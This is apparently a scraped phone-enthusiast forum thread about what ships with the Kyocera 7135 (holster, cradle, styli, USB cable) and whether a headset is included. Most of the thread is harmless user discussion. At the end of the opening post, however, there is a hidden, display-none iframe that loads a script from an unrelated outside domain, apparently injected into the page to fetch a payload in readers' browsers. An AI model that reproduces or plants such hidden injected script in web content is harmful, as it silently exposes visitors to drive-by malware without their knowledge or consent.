+ Reply to Thread

What's in the box?

Just curios what comes w/ the phone. I see people discussing the swivel holster but do not see it as an accessory on get connected's site. Does it come w/ the phone?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: What's in the box?

Originally posted by ericaustin
    Just curios what comes w/ the phone. I see people discussing the swivel holster but do not see it as an accessory on get connected's site. Does it come w/ the phone?
    Yes, swivel holster comes with the phone. You also get three cradle, three stylii and the CD with software/drivers.

ep

Re: Re: What's in the box?

Originally posted by davemayo
    Yes, swivel holster comes with the phone. You also get three cradle, three stylii and the CD with software/drivers.
    You get three cradles with the phone!?!

ep
    --ep

I believe he meant, "the" cradle
    --Jazz--

Originally posted by jazz
    Oops! :blush2

Cradle?

A Cradle? I thought it was just a wire. Damn. I ordered a cradle from Kyocera direct thinking that would be used at home, and the enclosed cable can be used on the road.

3 Stylii is nice.

--John

ep
    heheh, yeah. Oh well.

/me takes a deep breath
    --ep

The USB cable is nice but it doesn't come with another power adapter. It has a port for it but you need to buy it separately.

AJaM

poked back in
    Will the included cable run at USB speeds in the USB port or speeds of the serial cable?

Originally posted by M3wThr33
    Will the included cable run at USB speeds in the USB port or speeds of the serial cable?
    USB....

The search feature is your friend....

Alan

Do the Verizon 7135 phones come with any kind of headset / earphones (stereo or otherwise), or do you still need to buy those as accessories?

Do people recommend the OEM Kyocera stereo headset? Does the clip-on microphone work sufficiently, or is a headset with a "boom" microphone better?

(Or do people not really use the microphone much for handsfree / car use, since the 7135 has a built in speakerphone/mic combo? Does the built-in mic pick up voice without road noise ok?)

Chris

Originally posted by Chreotho
    Do the Verizon 7135 phones come with any kind of headset / earphones (stereo or otherwise), or do you still need to buy those as accessories?

Do people recommend the OEM Kyocera stereo headset? Does the clip-on microphone work sufficiently, or is a headset with a "boom" microphone better?

(Or do people not really use the microphone much for handsfree / car use, since the 7135 has a built in speakerphone/mic combo? Does the built-in mic pick up voice without road noise ok?)

Chris
    I am going to answer, but "The search function is your friend". Every one of your questions has been answered. many of them were the topic of long conversations with differing opinions. Here are mine:

It does not come with a headset. You need to purchase one seperatly if you want one. I won the Kyo stereo headset from this board, and the sound quality is excellent, but for some reason the earbuds don't stay in very well (others have complained of this too). The answer end button is something I would not want to live without now that I have tried it. (I also have a Jabra Bluetooth that does Answer/End emulation, but it is easy to get out of synch with it since it also turns the sound on and off on the headset. Not a problem with the Kyo one).

The speakerphone is very good for home/office use, but it wasn't quite loud enough for me to use in the car. I bought the kyo car kit and am pleased with it.

Alan

Originally posted by alanb
    I am going to answer, but "The search function is your friend".
    I'm beginning to think the "b" in alanb stands for broken record.

Originally posted by alanb
    It does not come with a headset. You need to purchase one seperatly if you want one. I won the Kyo stereo headset from this board, and the sound quality is excellent, but for some reason the earbuds don't stay in very well (others have complained of this too). The answer end button is something I would not want to live without now that I have tried it. (I also have a Jabra Bluetooth that does Answer/End emulation, but it is easy to get out of synch with it since it also turns the sound on and off on the headset. Not a problem with the Kyo one).
    Alan
    I agree that the stereo headbuds are good quality. (For the benefit of the peanuts, as you are probably already aware of this) The answer/end function is tied to the phone, i.e., the phone interprets the mic button as answer/end. I use the same single bud earpiece that I had for my 6035, but the 6035 interpreted the button press as a mute button. I actually prefer the answer/end quite a bit now (except when I have to burp, then I'm afraid cupping my hand over the mic doesn't quite kill the noise). I have put all my contacts into Voice Gear, and then I programmed the builtin voice-dialing (which activates if you hit the answer button) with a command to call the voice gear number, so I can have the phone in my pocket or on my belt, flip closed, and place calls doing nothing more than pushing the mic button. This is particularly good if you call people while you're driving, because it takes even less attention than changing the radio station.
    ---------------
    The same thing we do every night, Pinky...

Originally posted by BrerLapn
    I'm beginning to think the "b" in alanb stands for broken record.

Yeah... Every couple of weeks I reach my breaking point of seeing the same questions we have been seeing over and over and go on a bit of a tirade. I decided this time to just briefly mention it in every post and then answer the question anyway rather then really blowing up and not answering the question. We have a LOT of new owners on the board this week, so I figured I would play nice to not scare anyone off.

Alan

What is in the Box from Verizon?

Now that folks are receiving "real" verizon phones from verizon distribution, what actually comes in the box?

Thanks,
    Dave